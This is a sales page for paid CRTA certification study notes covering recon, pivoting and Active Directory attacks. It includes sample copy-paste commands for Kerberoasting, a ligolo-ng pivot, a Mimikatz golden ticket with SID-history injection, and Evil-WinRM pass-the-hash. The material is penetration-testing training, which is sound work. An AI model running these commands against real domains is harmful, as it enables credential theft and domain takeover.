CRTA Exam Notes
Complete 12-Page Guide with Copy-Paste Commands for BloodHound, Mimikatz, Impacket, ligolo-ng & Active Directory Attacks
Secure Payment · Instant Download · 12-Page PDF
What's Inside
Network Reconnaissance
- Nmap scanning commands
- RustScan for fast port discovery
- Web enumeration with feroxbuster
- Subnet scanning techniques
Active Directory Attacks
- BloodHound enumeration
- Kerberoasting with GetUserSPNs.py
- Pass-the-Hash attacks
- Golden/Silver ticket attacks
Privilege Escalation
- Linux SUID enumeration
- Windows privilege checks
- SID history injection
- Evil-WinRM connections
CRTA Exam Format
Sample Copy-Paste Commands from Notes
# BloodHound enumeration bloodhound-python -d domain.local -u user -p password -c All -ns 192.168.1.10 # Kerberoasting with Impacket GetUserSPNs.py domain.local/user:password -dc-ip 192.168.1.10 -request # ligolo-ng pivoting setup sudo ip tuntap add user attacker mode tun ligolo sudo ip route add 172.16.0.0/24 dev ligolo ./ligolo-ng_proxy -selfcert -laddr 0.0.0.0:11601 # Golden ticket with SID injection kerberos::golden /admin:attacker /domain:domain.local /sid:S-1-5-21-... /krbtgt:krbtgt_hash /sids:S-1-5-21-...-519 /ticket:ticket.kirbi # Evil-WinRM with hash evil-winrm -i 192.168.1.20 -u administrator -H NTLM_HASH
Tools & Techniques Covered
Why These Notes Work
Phase-Ordered Notes
- Recon through domain dominance by exam phase
- Quick lookup when the clock is running
Copy-Paste AD Attacks
- BloodHound, Impacket and Mimikatz commands ready to run
- Payload transfer commands in one place
Built for the 6-Hour Window
- Exam format breakdown up front
- Time-saving command references for the assessment
Frequently Asked Questions
12-page PDF format with organized sections covering Recon, Linux Enumeration, Pivoting (ligolo-ng & SSH), Windows Privilege Escalation, Active Directory attacks, and SID history injection. All commands are in plain text for easy copy-paste.
BloodHound, Mimikatz, Impacket (GetUserSPNs.py, secretsdump.py, ticketer.py, lookupsid.py), Rubeus, ligolo-ng, NetExec (nxc), Evil-WinRM, RustScan, feroxbuster, Winpeas/Linpeas, and more.
No. These are personal study notes compiled from real exam experience by Zishan Ahamed Thandar. Not official CyberWarFare Labs material.
Yes! The notes include detailed information about the 6-hour exam format, 17 flags requirement, VPN connection commands, and initial scope of engagement.
Yes! All buyers receive lifetime updates for free. You'll be notified via email when new versions are available.
Due to the digital nature of our products, all sales are final. We do not offer refunds once products are downloaded or accessed. Please review carefully before purchasing.
Ready to Ace Your CRTA Exam?
12 pages of battle-tested commands • Active Directory and pivoting focus • Updated for 2026
Get CRTA Notes Now